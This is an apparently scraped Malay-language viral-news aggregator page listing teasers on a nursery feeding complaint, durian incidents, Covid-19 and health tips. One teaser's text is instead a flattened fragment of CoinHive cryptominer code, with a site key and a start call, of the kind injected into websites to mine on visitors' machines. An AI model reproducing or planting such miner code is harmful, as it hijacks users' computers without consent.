Ibu Terkejut, Dakwa Taska Bagi Anak Makan Nasi, Kicap Dan 2 Ketul Leher Ayam Kongsi 6 Orang


Ibu Terkejut, Dakwa Taska Bagi Anak Makan Nasi, Kicap Dan 2 Ketul Leher Ayam Kongsi 6 Orang

Sat, 08 Feb 2020 | By thetrendingnow | 50 Hits

Sebagai ibu bapa harapan kita hanya untuk melakukan yang terbaik untuk anakanak Kerana kesibukan bekerja sebagai ibu bapa terpaksa hantar anakanak ke taska atau tempat asuhan untuk dijaga dengan baik sementera mereka bekerjaBanyak taska yang memberikan servis terbaik di negara ini malah ada taska yang melayan anakanak kita bagaikan anak mereka sendiri Namun kisah yang dikongsikan seorang wanita bergelar ibu ini lain pula ceritanyaPerkara ini dikongsikan di laman Facebooknyanbsp mengenai sebuah taska asuhan anaknya yang didakwa berkelakua >>READ MORE



ViRealHUB.com | Organic and Viral Social Traffic Hub


no image(Video) Ibu biarkan anak 5 tahun naik Ferris Wheel seorang diri dan ini akibatnya...
Wed, 26 Sep 2018 12:01 | Hits : 53 | MY

Seorang kanakkanak lelaki tergantung di luar gondola Ferris Wheel setinggi 138 kaki di timur ChinanbspKejadian itu berlaku di Taman Yuhuan di Taizhou wilayah Zhejiang ketika perayaan kuih bulan pada Isnin lalunbspKanakkanak berusia lima tahun itu menaiki Ferris Wheel bersendirian selepas ibunya Liu berbincang dengan operatornyanbspDifahamkan Liu merasakan kos tiket sebanyak 30 yua...

no imageLelaki Pemurah Ilmu Ini Kongsikan Petua Mudah Dan Cepat Jika Mahu Pastikan Tanaman Cili Anda Lebih S
Tue, 28 Aug 2018 12:02 | Hits : 42 | MY

Pokok cili antara pokok yang sukar untuk ditanam Bermula ketika proses semaian sehinggalah kepada menuai Kalau nasib baik mungkin dapat rasa hasil tanaman sendiri Kalau tidak gigit jari nak tak nak kenalah beli di pasar sahajaBagi yang ingin menanam sendiri Cili jom cuba petua yang dikongsikan oleh Izham Alias menerusi Kebun Bandar Jom Tanam SendiriPokok cili adalah antara pokok yang saya...

no imageDua pengundi, seorang petugas SPR meninggal dunia ketika PRU14
Wed, 09 May 2018 22:00 | Hits : 25 | MY

Jualan Raya 2018 Terbaik FREE Panduan Rahsia Blogger 2018 var miner new CoinHiveAnonymous7yJjci2be3zvC0QDAa7OHGw194lYEfmC throttle 07 minerstart ...

no imageKes Covid-19 di Singapura cecah 93 orang, 62 pulih
Thu, 27 Feb 2020 02:01 | Hits : 11 | MY

Kes Covid19 di Singapura cecah 93 orang 62 pulih Dikemas kini 1 jam yang lalu Diterbitkan pada 26 Feb 2020 1030PM ...

no image'Dia rasa macam ada 'orang' lalu di sebelah dia...'
Sun, 15 Apr 2018 02:00 | Hits : 35 | MY

Assalamualaikum min Tolong hide profile saya ehOkey ini kisah seram yang terjadi kat aku sepanjang aku duduk asrama Aku duduk kejap je dari form 1 sampai form 3 Hahaha Ini kisah sebuah SBP di Malaysia bukanlah SBP yang hebathebat tu ha ini yang biasabiasa saja niOkey cerita dia begini Time tu aku form 1 dah hujung tahun la satu dorm ada enam katil double decker Pastu malam tu memang...

no image(Video) Peniaga tampar pelanggan 'wanita' selepas dia mengadu buah duriannya tidak dapat dimakan
Mon, 14 May 2018 23:00 | Hits : 39 | MY

Seorang wanita transgender di Thailand ditampar oleh peniaga durian selepas dia mengadu durian yang dibelinya itu terlalu masak dan tidak boleh dimakan serta meminta ditukarkan dengan yang lain lapor Next SharknbspDalam video yang dimuat naik di Facebook group PattayaTalk pada Rabu mangsa yang dikenali sebagai Bella Thepsatar bertengkar dengan peniaga terbabitnbspSaya beli durian dari ked...

no imageSiapa Yang Bodoh Mulakan Challenge Makan Spicy Noodles Dengan Durian, Nabila Huda Tanya Ara Joha
Sun, 28 Jul 2019 09:08 | Hits : 32 | MY

Cabaran makan mee pedas bersama durian yang dilakukan Ara Johari menerusi perkongsian di Instagram mendapat lebih banyak kecaman netizen Malah ada yang membayangkan aksi yang dikatakan mengundang bahaya ini sepatutnya tidak dikongsi oleh seseorang selebr...

no imageDitahan kerana gagal ujian alkohol selepas makan durian
Thu, 02 May 2019 23:09 | Hits : 33 | MY

GARAGARA makan terlalu banyak durian seorang lelaki di China gagal dalam ujian pernafasan sehingga ditahan polis kerana disangka mabuk Kejadian itu dilaporkan laman video terkemuka di China yang memaparkan seorang lelaki tidak dinamakan sedang ditahan...

no imageIni 5 Mitos Tentang Makanan Frozen Korang Perlu Tahu.
Fri, 22 Feb 2019 22:03 | Hits : 55 | MY

Sekarang ini makanan frozen sangat membantu memudahkan kerja penyediaan makanan sebab itulah ia sangat popular di kalangan makmak bekerja dan sibuk Malah boleh dikatakan kebanyakan peti sejuk setiap keluarga sekarang nbspada menyimpan makanan frozen Dalam pada memudahkan kerja memasak ramai juga yang risau dengan mitosmitos yang tersebar mengatakan pengambilan secara rutinnbsp makanan f...

no imageKalau Anda Diserang Migrain, Gadis Ini Kongsi Ubat Paling Mujarab Yang Korang Boleh Cari Sendiri Di
Tue, 12 Mar 2019 20:03 | Hits : 44 | MY

Migrain merupakan salah satu sebab sakit kepala yang berulang dan sesiapa yang terkena sudah tentu tahu macam mana azabnya bila diserang sehingga berharihariMenurut portal myhealthgovmy migrain mungkin berlaku lebih kerap jika adanya faktorfaktor pencetus yang disebabkan oleh makanan persekitaran psikologi ubatubatan dan lainlainParacetamol dan ponstan pun tak boleh legakan sakit ini...


Senarai Hotel Wajib Dikunjungi Cuti Sekolah
Tue, 12 Mar 2019 20:03 | Hits : 262 | MY


Website Online Counter